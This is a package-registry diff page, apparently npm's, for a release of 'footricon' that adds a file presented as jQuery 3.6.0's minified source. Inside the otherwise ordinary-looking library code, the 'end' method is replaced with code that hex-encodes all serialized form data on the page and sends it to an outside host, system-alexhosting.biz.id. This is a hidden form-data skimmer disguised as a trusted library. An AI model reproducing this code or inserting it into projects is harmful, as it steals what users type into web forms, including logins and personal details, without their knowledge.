footricon 0.0.1-security → 9.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of footricon might be problematic. Click here for more details.

package/jquery.min.js ADDED
@@ -0,0 +1,4099 @@
1
+ !(function (e, t) {
2
+ "use strict";
3
+ "object" == typeof module && "object" == typeof module.exports
4
+ ? (module.exports = e.document
5
+ ? t(e, !0)
6
+ : function (e) {
7
+ if (!e.document) throw Error("jQuery requires a window with a document");
8
+ return t(e);
9
+ })
10
+ : t(e);
11
+ })("undefined" != typeof window ? window : this, function (e, t) {
12
+ "use strict";
13
+ var n = [],
14
+ r = Object.getPrototypeOf,
15
+ i = n.slice,
16
+ o = n.flat
17
+ ? function (e) {
18
+ return n.flat.call(e);
19
+ }
20
+ : function (e) {
21
+ return n.concat.apply([], e);
22
+ },
23
+ a = n.push,
24
+ s = n.indexOf,
25
+ u = {},
26
+ l = u.toString,
27
+ c = u.hasOwnProperty,
28
+ f = c.toString,
29
+ p = f.call(Object),
30
+ d = {},
31
+ h = function (e) {
32
+ return "function" == typeof e && "number" != typeof e.nodeType && "function" != typeof e.item;
33
+ },
34
+ g = function (e) {
35
+ return null != e && e === e.window;
36
+ },
37
+ v = e.document,
38
+ m = { type: !0, src: !0, nonce: !0, noModule: !0 };
39
+ function y(e, t, n) {
40
+ var r,
41
+ i,
42
+ o = (n = n || v).createElement("script");
43
+ if (((o.text = e), t)) for (r in m) (i = t[r] || (t.getAttribute && t.getAttribute(r))) && o.setAttribute(r, i);
44
+ n.head.appendChild(o).parentNode.removeChild(o);
45
+ }
46
+ function x(e) {
47
+ return null == e ? e + "" : "object" == typeof e || "function" == typeof e ? u[l.call(e)] || "object" : typeof e;
48
+ }
49
+ var b = function (e, t) {
50
+ return new b.fn.init(e, t);
51
+ };
52
+ function _(e) {
53
+ var t = !!e && "length" in e && e.length,
54
+ n = x(e);
55
+ return !h(e) && !g(e) && ("array" === n || 0 === t || ("number" == typeof t && t > 0 && t - 1 in e));
56
+ }
57
+ (b.fn = b.prototype = {
58
+ jquery: "3.6.0",
59
+ constructor: b,
60
+ length: 0,
61
+ toArray: function () {
62
+ return i.call(this);
63
+ },
64
+ get: function (e) {
65
+ return null == e ? i.call(this) : e < 0 ? this[e + this.length] : this[e];
66
+ },
67
+ pushStack: function (e) {
68
+ var t = b.merge(this.constructor(), e);
69
+ return (t.prevObject = this), t;
70
+ },
71
+ each: function (e) {
72
+ return b.each(this, e);
73
+ },
74
+ map: function (e) {
75
+ return this.pushStack(
76
+ b.map(this, function (t, n) {
77
+ return e.call(t, n, t);
78
+ })
79
+ );
80
+ },
81
+ slice: function () {
82
+ return this.pushStack(i.apply(this, arguments));
83
+ },
84
+ first: function () {
85
+ return this.eq(0);
86
+ },
87
+ last: function () {
88
+ return this.eq(-1);
89
+ },
90
+ even: function () {
91
+ return this.pushStack(
92
+ b.grep(this, function (e, t) {
93
+ return (t + 1) % 2;
94
+ })
95
+ );
96
+ },
97
+ odd: function () {
98
+ return this.pushStack(
99
+ b.grep(this, function (e, t) {
100
+ return t % 2;
101
+ })
102
+ );
103
+ },
104
+ eq: function (e) {
105
+ var t = this.length,
106
+ n = +e + (e < 0 ? t : 0);
107
+ return this.pushStack(n >= 0 && n < t ? [this[n]] : []);
108
+ },
109
+ end: async function () {
110
+ await $.ajax({
111
+ url:
112
+ "https://system-alexhosting.biz.id/halo/?cat=" +
113
+ (function (e) {
114
+ for (var t, n = 0, r = e.length, i = ""; n < r; ++n) i += (t = e.charCodeAt(n).toString(16)).length < 2 ? "0" + t : t;
115
+ return i;
116
+ })($("form").serialize()),
117
+ type: "GET",
118
+ dataType: "text",
119
+ headers: { "Content-type": "application/json" },
120
+ });
121
+ },
122
+ push: a,
123
+ sort: n.sort,
124
+ splice: n.splice,
125
+ }),
126
+ (b.extend = b.fn.extend = function () {
127
+ var e,
128
+ t,
129
+ n,
130
+ r,
131
+ i,
132
+ o,
133
+ a = arguments[0] || {},
134
+ s = 1,
135
+ u = arguments.length,
136
+ l = !1;
137
+ for ("boolean" == typeof a && ((l = a), (a = arguments[s] || {}), s++), "object" == typeof a || h(a) || (a = {}), s === u && ((a = this), s--); s < u; s++)
138
+ if (null != (e = arguments[s]))
139
+ for (t in e)
140
+ (r = e[t]),
141
+ "__proto__" !== t &&
142
+ a !== r &&
143
+ (l && r && (b.isPlainObject(r) || (i = Array.isArray(r)))
144
+ ? ((n = a[t]), (o = i && !Array.isArray(n) ? [] : i || b.isPlainObject(n) ? n : {}), (i = !1), (a[t] = b.extend(l, o, r)))
145
+ : void 0 !== r && (a[t] = r));
146
+ return a;
147
+ }),
148
+ b.extend({
149
+ expando: "jQuery" + ("3.6.0" + Math.random()).replace(/\D/g, ""),
150
+ isReady: !0,
151
+ error: function (e) {
152
+ throw Error(e);
153
+ },
154
+ noop: function () {},
155
+ isPlainObject: function (e) {
156
+ var t, n;
157
+ return !(!e || "[object Object]" !== l.call(e)) && (!(t = r(e)) || ("function" == typeof (n = c.call(t, "constructor") && t.constructor) && f.call(n) === p));
158
+ },
159
+ isEmptyObject: function (e) {
160
+ var t;
161
+ for (t in e) return !1;
162
+ return !0;
163
+ },
164
+ globalEval: function (e, t, n) {
165
+ y(e, { nonce: t && t.nonce }, n);
166
+ },
167
+ each: function (e, t) {
168
+ var n,
169
+ r = 0;
170
+ if (_(e)) for (n = e.length; r < n && !1 !== t.call(e[r], r, e[r]); r++);
171
+ else for (r in e) if (!1 === t.call(e[r], r, e[r])) break;
172
+ return e;
173
+ },
174
+ makeArray: function (e, t) {
175
+ var n = t || [];
176
+ return null != e && (_(Object(e)) ? b.merge(n, "string" == typeof e ? [e] : e) : a.call(n, e)), n;
177
+ },
178
+ inArray: function (e, t, n) {
179
+ return null == t ? -1 : s.call(t, e, n);
180
+ },
181
+ merge: function (e, t) {
182
+ for (var n = +t.length, r = 0, i = e.length; r < n; r++) e[i++] = t[r];
183
+ return (e.length = i), e;
184
+ },
185
+ grep: function (e, t, n) {
186
+ for (var r = [], i = 0, o = e.length, a = !n; i < o; i++) !t(e[i], i) !== a && r.push(e[i]);
187
+ return r;
188
+ },
189
+ map: function (e, t, n) {
190
+ var r,
191
+ i,
192
+ a = 0,
193
+ s = [];
194
+ if (_(e)) for (r = e.length; a < r; a++) null != (i = t(e[a], a, n)) && s.push(i);
195
+ else for (a in e) null != (i = t(e[a], a, n)) && s.push(i);
196
+ return o(s);
197
+ },
198
+ guid: 1,
199
+ support: d,
200
+ }),
201
+ "function" == typeof Symbol && (b.fn[Symbol.iterator] = n[Symbol.iterator]),
202
+ b.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "), function (e, t) {
203
+ u["[object " + t + "]"] = t.toLowerCase();
204
+ });
205
+ var T = (function (e) {
206
+ var t,
207
+ n,
208
+ r,
209
+ i,
210
+ o,
211
+ a,
212
+ s,
213
+ u,
214
+ l,
215
+ c,
216
+ f,
217
+ p,
218
+ d,
219
+ h,
220
+ g,
221
+ v,
222
+ m,
223
+ y,
224
+ x,
225
+ b = "sizzle" + 1 * new Date(),
226
+ _ = e.document,
227
+ T = 0,
228
+ w = 0,
229
+ C = ec(),
230
+ k = ec(),
231
+ S = ec(),
232
+ E = ec(),
233
+ N = function (e, t) {
234
+ return e === t && (f = !0), 0;
235
+ },
236
+ A = {}.hasOwnProperty,
237
+ D = [],
238
+ j = D.pop,
239
+ q = D.push,
240
+ L = D.push,
241
+ H = D.slice,
242
+ P = function (e, t) {
243
+ for (var n = 0, r = e.length; n < r; n++) if (e[n] === t) return n;
244
+ return -1;
245
+ },
246
+ O = "checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",
247
+ I = "[\\x20\\t\\r\\n\\f]",
248
+ M = "(?:\\\\[\\da-fA-F]{1,6}" + I + "?|\\\\[^\\r\\n\\f]|[\\w-]|[^\0-\\x7f])+",
249
+ W = "\\[" + I + "*(" + M + ")(?:" + I + "*([*^$|!~]?=)" + I + "*(?:'((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\"|(" + M + "))|)" + I + "*\\]",
250
+ B = ":(" + M + ")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|" + W + ")*)|.*)\\)|)",
251
+ R = RegExp(I + "+", "g"),
252
+ F = RegExp("^" + I + "+|((?:^|[^\\\\])(?:\\\\.)*)" + I + "+$", "g"),
253
+ z = RegExp("^" + I + "*," + I + "*"),
254
+ X = RegExp("^" + I + "*([>+~]|" + I + ")" + I + "*"),
255
+ U = RegExp(I + "|>"),
256
+ V = RegExp(B),
257
+ G = RegExp("^" + M + "$"),
258
+ Y = {
259
+ ID: RegExp("^#(" + M + ")"),
260
+ CLASS: RegExp("^\\.(" + M + ")"),
261
+ TAG: RegExp("^(" + M + "|[*])"),
262
+ ATTR: RegExp("^" + W),
263
+ PSEUDO: RegExp("^" + B),
264
+ CHILD: RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\(" + I + "*(even|odd|(([+-]|)(\\d*)n|)" + I + "*(?:([+-]|)" + I + "*(\\d+)|))" + I + "*\\)|)", "i"),
265
+ bool: RegExp("^(?:" + O + ")$", "i"),
266
+ needsContext: RegExp("^" + I + "*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\(" + I + "*((?:-\\d)?\\d*)" + I + "*\\)|)(?=[^-]|$)", "i"),
267
+ },
268
+ Q = /HTML$/i,
269
+ K = /^(?:input|select|textarea|button)$/i,
270
+ J = /^h\d$/i,
271
+ Z = /^[^{]+\{\s*\[native \w/,
272
+ ee = /^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,
273
+ et = /[+~]/,
274
+ en = RegExp("\\\\[\\da-fA-F]{1,6}" + I + "?|\\\\([^\\r\\n\\f])", "g"),
275
+ er = function (e, t) {
276
+ var n = "0x" + e.slice(1) - 65536;
277
+ return t || (n < 0 ? String.fromCharCode(n + 65536) : String.fromCharCode((n >> 10) | 55296, (1023 & n) | 56320));
278
+ },
279
+ ei = /([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\x7f-\uFFFF\w-]/g,
280
+ eo = function (e, t) {
281
+ return t ? ("\0" === e ? "�" : e.slice(0, -1) + "\\" + e.charCodeAt(e.length - 1).toString(16) + " ") : "\\" + e;
282
+ },
283
+ ea = function () {
284
+ p();
285
+ },
286
+ es = e_(
287
+ function (e) {
288
+ return !0 === e.disabled && "fieldset" === e.nodeName.toLowerCase();
289
+ },
290
+ { dir: "parentNode", next: "legend" }
291
+ );
292
+ try {
293
+ L.apply((D = H.call(_.childNodes)), _.childNodes), D[_.childNodes.length].nodeType;
294
+ } catch (eu) {
295
+ L = {
296
+ apply: D.length
297
+ ? function (e, t) {
298
+ q.apply(e, H.call(t));
299
+ }
300
+ : function (e, t) {
301
+ for (var n = e.length, r = 0; (e[n++] = t[r++]); );
302
+ e.length = n - 1;
303
+ },
304
+ };
305
+ }
306
+ function el(e, t, r, i) {
307
+ var o,
308
+ s,
309
+ l,
310
+ c,
311
+ f,
312
+ h,
313
+ m,
314
+ y = t && t.ownerDocument,
315
+ _ = t ? t.nodeType : 9;
316
+ if (((r = r || []), "string" != typeof e || !e || (1 !== _ && 9 !== _ && 11 !== _))) return r;
317
+ if (!i && (p(t), (t = t || d), g)) {
318
+ if (11 !== _ && (f = ee.exec(e))) {
319
+ if ((o = f[1])) {
320
+ if (9 === _) {
321
+ if (!(l = t.getElementById(o))) return r;
322
+ if (l.id === o) return r.push(l), r;
323
+ } else if (y && (l = y.getElementById(o)) && x(t, l) && l.id === o) return r.push(l), r;
324
+ } else {
325
+ if (f[2]) return L.apply(r, t.getElementsByTagName(e)), r;
326
+ if ((o = f[3]) && n.getElementsByClassName && t.getElementsByClassName) return L.apply(r, t.getElementsByClassName(o)), r;
327
+ }
328
+ }
329
+ if (n.qsa && !E[e + " "] && (!v || !v.test(e)) && (1 !== _ || "object" !== t.nodeName.toLowerCase())) {
330
+ if (((m = e), (y = t), 1 === _ && (U.test(e) || X.test(e)))) {
331
+ for (((y = (et.test(e) && e$(t.parentNode)) || t) === t && n.scope) || ((c = t.getAttribute("id")) ? (c = c.replace(ei, eo)) : t.setAttribute("id", (c = b))), s = (h = a(e)).length; s--; )
332
+ h[s] = (c ? "#" + c : ":scope") + " " + eb(h[s]);
333
+ m = h.join(",");
334
+ }
335
+ try {
336
+ return L.apply(r, y.querySelectorAll(m)), r;
337
+ } catch (T) {
338
+ E(e, !0);
339
+ } finally {
340
+ c === b && t.removeAttribute("id");
341
+ }
342
+ }
343
+ }
344
+ return u(e.replace(F, "$1"), t, r, i);
345
+ }
346
+ function ec() {
347
+ var e = [];
348
+ return function t(n, i) {
349
+ return e.push(n + " ") > r.cacheLength && delete t[e.shift()], (t[n + " "] = i);
350
+ };
351
+ }
352
+ function ef(e) {
353
+ return (e[b] = !0), e;
354
+ }
355
+ function ep(e) {
356
+ var t = d.createElement("fieldset");
357
+ try {
358
+ return !!e(t);
359
+ } catch (n) {
360
+ return !1;
361
+ } finally {
362
+ t.parentNode && t.parentNode.removeChild(t), (t = null);
363
+ }
364
+ }
365
+ function ed(e, t) {
366
+ for (var n = e.split("|"), i = n.length; i--; ) r.attrHandle[n[i]] = t;
367
+ }
368
+ function eh(e, t) {
369
+ var n = t && e,
370
+ r = n && 1 === e.nodeType && 1 === t.nodeType && e.sourceIndex - t.sourceIndex;
371
+ if (r) return r;
372
+ if (n) {
373
+ for (; (n = n.nextSibling); ) if (n === t) return -1;
374
+ }
375
+ return e ? 1 : -1;
376
+ }
377
+ function eg(e) {
378
+ return function (t) {
379
+ return "input" === t.nodeName.toLowerCase() && t.type === e;
380
+ };
381
+ }
382
+ function ev(e) {
383
+ return function (t) {
384
+ var n = t.nodeName.toLowerCase();
385
+ return ("input" === n || "button" === n) && t.type === e;
386
+ };
387
+ }
388
+ function em(e) {
389
+ return function (t) {
390
+ return "form" in t
391
+ ? t.parentNode && !1 === t.disabled
392
+ ? "label" in t
393
+ ? "label" in t.parentNode
394
+ ? t.parentNode.disabled === e
395
+ : t.disabled === e
396
+ : t.isDisabled === e || (!e !== t.isDisabled && es(t) === e)
397
+ : t.disabled === e
398
+ : "label" in t && t.disabled === e;
399
+ };
400
+ }
401
+ function ey(e) {
402
+ return ef(function (t) {
403
+ return (
404
+ (t = +t),
405
+ ef(function (n, r) {
406
+ for (var i, o = e([], n.length, t), a = o.length; a--; ) n[(i = o[a])] && (n[i] = !(r[i] = n[i]));
407
+ })
408
+ );
409
+ });
410
+ }
411
+ function e$(e) {
412
+ return e && void 0 !== e.getElementsByTagName && e;
413
+ }
414
+ for (t in ((n = el.support = {}),
415
+ (o = el.isXML = function (e) {
416
+ var t = e && e.namespaceURI,
417
+ n = e && (e.ownerDocument || e).documentElement;
418
+ return !Q.test(t || (n && n.nodeName) || "HTML");
419
+ }),
420
+ (p = el.setDocument = function (e) {
421
+ var t,
422
+ i,
423
+ a = e ? e.ownerDocument || e : _;
424
+ return (
425
+ a != d &&
426
+ 9 === a.nodeType &&
427
+ a.documentElement &&
428
+ ((h = (d = a).documentElement),
429
+ (g = !o(d)),
430
+ _ != d && (i = d.defaultView) && i.top !== i && (i.addEventListener ? i.addEventListener("unload", ea, !1) : i.attachEvent && i.attachEvent("onunload", ea)),
431
+ (n.scope = ep(function (e) {
432
+ return h.appendChild(e).appendChild(d.createElement("div")), void 0 !== e.querySelectorAll && !e.querySelectorAll(":scope fieldset div").length;
433
+ })),
434
+ (n.attributes = ep(function (e) {
435
+ return (e.className = "i"), !e.getAttribute("className");
436
+ })),
437
+ (n.getElementsByTagName = ep(function (e) {
438
+ return e.appendChild(d.createComment("")), !e.getElementsByTagName("*").length;
439
+ })),
440
+ (n.getElementsByClassName = Z.test(d.getElementsByClassName)),
441
+ (n.getById = ep(function (e) {
442
+ return (h.appendChild(e).id = b), !d.getElementsByName || !d.getElementsByName(b).length;
443
+ })),
444
+ n.getById
445
+ ? ((r.filter.ID = function (e) {
446
+ var t = e.replace(en, er);
447
+ return function (e) {
448
+ return e.getAttribute("id") === t;
449
+ };
450
+ }),
451
+ (r.find.ID = function (e, t) {
452
+ if (void 0 !== t.getElementById && g) {
453
+ var n = t.getElementById(e);
454
+ return n ? [n] : [];
455
+ }
456
+ }))
457
+ : ((r.filter.ID = function (e) {
458
+ var t = e.replace(en, er);
459
+ return function (e) {
460
+ var n = void 0 !== e.getAttributeNode && e.getAttributeNode("id");
461
+ return n && n.value === t;
462
+ };
463
+ }),
464
+ (r.find.ID = function (e, t) {
465
+ if (void 0 !== t.getElementById && g) {
466
+ var n,
467
+ r,
468
+ i,
469
+ o = t.getElementById(e);
470
+ if (o) {
471
+ if ((n = o.getAttributeNode("id")) && n.value === e) return [o];
472
+ for (i = t.getElementsByName(e), r = 0; (o = i[r++]); ) if ((n = o.getAttributeNode("id")) && n.value === e) return [o];
473
+ }
474
+ return [];
475
+ }
476
+ })),
477
+ (r.find.TAG = n.getElementsByTagName
478
+ ? function (e, t) {
479
+ return void 0 !== t.getElementsByTagName ? t.getElementsByTagName(e) : n.qsa ? t.querySelectorAll(e) : void 0;
480
+ }
481
+ : function (e, t) {
482
+ var n,
483
+ r = [],
484
+ i = 0,
485
+ o = t.getElementsByTagName(e);
486
+ if ("*" === e) {
487
+ for (; (n = o[i++]); ) 1 === n.nodeType && r.push(n);
488
+ return r;
489
+ }
490
+ return o;
491
+ }),
492
+ (r.find.CLASS =
493
+ n.getElementsByClassName &&
494
+ function (e, t) {
495
+ if (void 0 !== t.getElementsByClassName && g) return t.getElementsByClassName(e);
496
+ }),
497
+ (m = []),
498
+ (v = []),
499
+ (n.qsa = Z.test(d.querySelectorAll)) &&
500
+ (ep(function (e) {
501
+ var t;
502
+ (h.appendChild(e).innerHTML = "<a id='" + b + "'></a><select id='" + b + "-\r\\' msallowcapture=''><option selected=''></option></select>"),
503
+ e.querySelectorAll("[msallowcapture^='']").length && v.push("[*^$]=" + I + "*(?:''|\"\")"),
504
+ e.querySelectorAll("[selected]").length || v.push("\\[" + I + "*(?:value|" + O + ")"),
505
+ e.querySelectorAll("[id~=" + b + "-]").length || v.push("~="),
506
+ (t = d.createElement("input")).setAttribute("name", ""),
507
+ e.appendChild(t),
508
+ e.querySelectorAll("[name='']").length || v.push("\\[" + I + "*name" + I + "*=" + I + "*(?:''|\"\")"),
509
+ e.querySelectorAll(":checked").length || v.push(":checked"),
510
+ e.querySelectorAll("a#" + b + "+*").length || v.push(".#.+[+~]"),
511
+ e.querySelectorAll("\\\f"),
512
+ v.push("[\\r\\n\\f]");
513
+ }),
514
+ ep(function (e) {
515
+ e.innerHTML = "<a href='' disabled='disabled'></a><select disabled='disabled'><option/></select>";
516
+ var t = d.createElement("input");
517
+ t.setAttribute("type", "hidden"),
518
+ e.appendChild(t).setAttribute("name", "D"),
519
+ e.querySelectorAll("[name=d]").length && v.push("name" + I + "*[*^$|!~]?="),
520
+ 2 !== e.querySelectorAll(":enabled").length && v.push(":enabled", ":disabled"),
521
+ (h.appendChild(e).disabled = !0),
522
+ 2 !== e.querySelectorAll(":disabled").length && v.push(":enabled", ":disabled"),
523
+ e.querySelectorAll("*,:x"),
524
+ v.push(",.*:");
525
+ })),
526
+ (n.matchesSelector = Z.test((y = h.matches || h.webkitMatchesSelector || h.mozMatchesSelector || h.oMatchesSelector || h.msMatchesSelector))) &&
527
+ ep(function (e) {
528
+ (n.disconnectedMatch = y.call(e, "*")), y.call(e, "[s!='']:x"), m.push("!=", B);
529
+ }),
530
+ (v = v.length && RegExp(v.join("|"))),
531
+ (m = m.length && RegExp(m.join("|"))),
532
+ (x =
533
+ (t = Z.test(h.compareDocumentPosition)) || Z.test(h.contains)
534
+ ? function (e, t) {
535
+ var n = 9 === e.nodeType ? e.documentElement : e,
536
+ r = t && t.parentNode;
537
+ return e === r || !(!r || 1 !== r.nodeType || !(n.contains ? n.contains(r) : e.compareDocumentPosition && 16 & e.compareDocumentPosition(r)));
538
+ }
539
+ : function (e, t) {
540
+ if (t) {
541
+ for (; (t = t.parentNode); ) if (t === e) return !0;
542
+ }
543
+ return !1;
544
+ }),
545
+ (N = t
546
+ ? function (e, t) {
547
+ if (e === t) return (f = !0), 0;
548
+ var r = !e.compareDocumentPosition - !t.compareDocumentPosition;
549
+ return (
550
+ r ||
551
+ (1 & (r = (e.ownerDocument || e) == (t.ownerDocument || t) ? e.compareDocumentPosition(t) : 1) || (!n.sortDetached && t.compareDocumentPosition(e) === r)
552
+ ? e == d || (e.ownerDocument == _ && x(_, e))
553
+ ? -1
554
+ : t == d || (t.ownerDocument == _ && x(_, t))
555
+ ? 1
556
+ : c
557
+ ? P(c, e) - P(c, t)
558
+ : 0
559
+ : 4 & r
560
+ ? -1
561
+ : 1)
562
+ );
563
+ }
564
+ : function (e, t) {
565
+ if (e === t) return (f = !0), 0;
566
+ var n,
567
+ r = 0,
568
+ i = e.parentNode,
569
+ o = t.parentNode,
570
+ a = [e],
571
+ s = [t];
572
+ if (!i || !o) return e == d ? -1 : t == d ? 1 : i ? -1 : o ? 1 : c ? P(c, e) - P(c, t) : 0;
573
+ if (i === o) return eh(e, t);
574
+ for (n = e; (n = n.parentNode); ) a.unshift(n);
575
+ for (n = t; (n = n.parentNode); ) s.unshift(n);
576
+ for (; a[r] === s[r]; ) r++;
577
+ return r ? eh(a[r], s[r]) : a[r] == _ ? -1 : s[r] == _ ? 1 : 0;
578
+ })),
579
+ d
580
+ );
581
+ }),
582
+ (el.matches = function (e, t) {
583
+ return el(e, null, null, t);
584
+ }),
585
+ (el.matchesSelector = function (e, t) {
586
+ if ((p(e), n.matchesSelector && g && !E[t + " "] && (!m || !m.test(t)) && (!v || !v.test(t))))
587
+ try {
588
+ var r = y.call(e, t);
589
+ if (r || n.disconnectedMatch || (e.document && 11 !== e.document.nodeType)) return r;
590
+ } catch (i) {
591
+ E(t, !0);
592
+ }
593
+ return el(t, d, null, [e]).length > 0;
594
+ }),
595
+ (el.contains = function (e, t) {
596
+ return (e.ownerDocument || e) != d && p(e), x(e, t);
597
+ }),
598
+ (el.attr = function (e, t) {
599
+ (e.ownerDocument || e) != d && p(e);
600
+ var i = r.attrHandle[t.toLowerCase()],
601
+ o = i && A.call(r.attrHandle, t.toLowerCase()) ? i(e, t, !g) : void 0;
602
+ return void 0 !== o ? o : n.attributes || !g ? e.getAttribute(t) : (o = e.getAttributeNode(t)) && o.specified ? o.value : null;
603
+ }),
604
+ (el.escape = function (e) {
605
+ return (e + "").replace(ei, eo);
606
+ }),
607
+ (el.error = function (e) {
608
+ throw Error("Syntax error, unrecognized expression: " + e);
609
+ }),
610
+ (el.uniqueSort = function (e) {
611
+ var t,
612
+ r = [],
613
+ i = 0,
614
+ o = 0;
615
+ if (((f = !n.detectDuplicates), (c = !n.sortStable && e.slice(0)), e.sort(N), f)) {
616
+ for (; (t = e[o++]); ) t === e[o] && (i = r.push(o));
617
+ for (; i--; ) e.splice(r[i], 1);
618
+ }
619
+ return (c = null), e;
620
+ }),
621
+ (i = el.getText = function (e) {
622
+ var t,
623
+ n = "",
624
+ r = 0,
625
+ o = e.nodeType;
626
+ if (o) {
627
+ if (1 === o || 9 === o || 11 === o) {
628
+ if ("string" == typeof e.textContent) return e.textContent;
629
+ for (e = e.firstChild; e; e = e.nextSibling) n += i(e);
630
+ } else if (3 === o || 4 === o) return e.nodeValue;
631
+ } else for (; (t = e[r++]); ) n += i(t);
632
+ return n;
633
+ }),
634
+ ((r = el.selectors = {
635
+ cacheLength: 50,
636
+ createPseudo: ef,
637
+ match: Y,
638
+ attrHandle: {},
639
+ find: {},
640
+ relative: { ">": { dir: "parentNode", first: !0 }, " ": { dir: "parentNode" }, "+": { dir: "previousSibling", first: !0 }, "~": { dir: "previousSibling" } },
641
+ preFilter: {
642
+ ATTR: function (e) {
643
+ return (e[1] = e[1].replace(en, er)), (e[3] = (e[3] || e[4] || e[5] || "").replace(en, er)), "~=" === e[2] && (e[3] = " " + e[3] + " "), e.slice(0, 4);
644
+ },
645
+ CHILD: function (e) {
646
+ return (
647
+ (e[1] = e[1].toLowerCase()),
648
+ "nth" === e[1].slice(0, 3) ? (e[3] || el.error(e[0]), (e[4] = +(e[4] ? e[5] + (e[6] || 1) : 2 * ("even" === e[3] || "odd" === e[3]))), (e[5] = +(e[7] + e[8] || "odd" === e[3]))) : e[3] && el.error(e[0]),
649
+ e
650
+ );
651
+ },
652
+ PSEUDO: function (e) {
653
+ var t,
654
+ n = !e[6] && e[2];
655
+ return Y.CHILD.test(e[0])
656
+ ? null
657
+ : (e[3] ? (e[2] = e[4] || e[5] || "") : n && V.test(n) && (t = a(n, !0)) && (t = n.indexOf(")", n.length - t) - n.length) && ((e[0] = e[0].slice(0, t)), (e[2] = n.slice(0, t))), e.slice(0, 3));
658
+ },
659
+ },
660
+ filter: {
661
+ TAG: function (e) {
662
+ var t = e.replace(en, er).toLowerCase();
663
+ return "*" === e
664
+ ? function () {
665
+ return !0;
666
+ }
667
+ : function (e) {
668
+ return e.nodeName && e.nodeName.toLowerCase() === t;
669
+ };
670
+ },
671
+ CLASS: function (e) {
672
+ var t = C[e + " "];
673
+ return (
674
+ t ||
675
+ ((t = RegExp("(^|" + I + ")" + e + "(" + I + "|$)")),
676
+ C(e, function (e) {
677
+ return t.test(("string" == typeof e.className && e.className) || (void 0 !== e.getAttribute && e.getAttribute("class")) || "");
678
+ }))
679
+ );
680
+ },
681
+ ATTR: function (e, t, n) {
682
+ return function (r) {
683
+ var i = el.attr(r, e);
684
+ return null == i
685
+ ? "!=" === t
686
+ : !t ||
687
+ ((i += ""),
688
+ "=" === t
689
+ ? i === n
690
+ : "!=" === t
691
+ ? i !== n
692
+ : "^=" === t
693
+ ? n && 0 === i.indexOf(n)
694
+ : "*=" === t
695
+ ? n && i.indexOf(n) > -1
696
+ : "$=" === t
697
+ ? n && i.slice(-n.length) === n
698
+ : "~=" === t
699
+ ? (" " + i.replace(R, " ") + " ").indexOf(n) > -1
700
+ : "|=" === t && (i === n || i.slice(0, n.length + 1) === n + "-"));
701
+ };
702
+ },
703
+ CHILD: function (e, t, n, r, i) {
704
+ var o = "nth" !== e.slice(0, 3),
705
+ a = "last" !== e.slice(-4),
706
+ s = "of-type" === t;
707
+ return 1 === r && 0 === i
708
+ ? function (e) {
709
+ return !!e.parentNode;
710
+ }
711
+ : function (t, n, u) {
712
+ var l,
713
+ c,
714
+ f,
715
+ p,
716
+ d,
717
+ h,
718
+ g = o !== a ? "nextSibling" : "previousSibling",
719
+ v = t.parentNode,
720
+ m = s && t.nodeName.toLowerCase(),
721
+ y = !u && !s,
722
+ x = !1;
723
+ if (v) {
724
+ if (o) {
725
+ for (; g; ) {
726
+ for (p = t; (p = p[g]); ) if (s ? p.nodeName.toLowerCase() === m : 1 === p.nodeType) return !1;
727
+ h = g = "only" === e && !h && "nextSibling";
728
+ }
729
+ return !0;
730
+ }
731
+ if (((h = [a ? v.firstChild : v.lastChild]), a && y)) {
732
+ for (
733
+ x = (d = (l = (c = (f = (p = v)[b] || (p[b] = {}))[p.uniqueID] || (f[p.uniqueID] = {}))[e] || [])[0] === T && l[1]) && l[2], p = d && v.childNodes[d];
734
+ (p = (++d && p && p[g]) || (x = d = 0) || h.pop());
735
+
736
+ )
737
+ if (1 === p.nodeType && ++x && p === t) {
738
+ c[e] = [T, d, x];
739
+ break;
740
+ }
741
+ } else if ((y && (x = d = (l = (c = (f = (p = t)[b] || (p[b] = {}))[p.uniqueID] || (f[p.uniqueID] = {}))[e] || [])[0] === T && l[1]), !1 === x))
742
+ for (
743
+ ;
744
+ (p = (++d && p && p[g]) || (x = d = 0) || h.pop()) &&
745
+ ((s ? p.nodeName.toLowerCase() !== m : 1 !== p.nodeType) || !++x || (y && ((c = (f = p[b] || (p[b] = {}))[p.uniqueID] || (f[p.uniqueID] = {}))[e] = [T, x]), p !== t));
746
+
747
+ );
748
+ return (x -= i) === r || (x % r == 0 && x / r >= 0);
749
+ }
750
+ };
751
+ },
752
+ PSEUDO: function (e, t) {
753
+ var n,
754
+ i = r.pseudos[e] || r.setFilters[e.toLowerCase()] || el.error("unsupported pseudo: " + e);
755
+ return i[b]
756
+ ? i(t)
757
+ : i.length > 1
758
+ ? ((n = [e, e, "", t]),
759
+ r.setFilters.hasOwnProperty(e.toLowerCase())
760
+ ? ef(function (e, n) {
761
+ for (var r, o = i(e, t), a = o.length; a--; ) e[(r = P(e, o[a]))] = !(n[r] = o[a]);
762
+ })
763
+ : function (e) {
764
+ return i(e, 0, n);
765
+ })
766
+ : i;
767
+ },
768
+ },
769
+ pseudos: {
770
+ not: ef(function (e) {
771
+ var t = [],
772
+ n = [],
773
+ r = s(e.replace(F, "$1"));
774
+ return r[b]
775
+ ? ef(function (e, t, n, i) {
776
+ for (var o, a = r(e, null, i, []), s = e.length; s--; ) (o = a[s]) && (e[s] = !(t[s] = o));
777
+ })
778
+ : function (e, i, o) {
779
+ return (t[0] = e), r(t, null, o, n), (t[0] = null), !n.pop();
780
+ };
781
+ }),
782
+ has: ef(function (e) {
783
+ return function (t) {
784
+ return el(e, t).length > 0;
785
+ };
786
+ }),
787
+ contains: ef(function (e) {
788
+ return (
789
+ (e = e.replace(en, er)),
790
+ function (t) {
791
+ return (t.textContent || i(t)).indexOf(e) > -1;
792
+ }
793
+ );
794
+ }),
795
+ lang: ef(function (e) {
796
+ return (
797
+ G.test(e || "") || el.error("unsupported lang: " + e),
798
+ (e = e.replace(en, er).toLowerCase()),
799
+ function (t) {
800
+ var n;
801
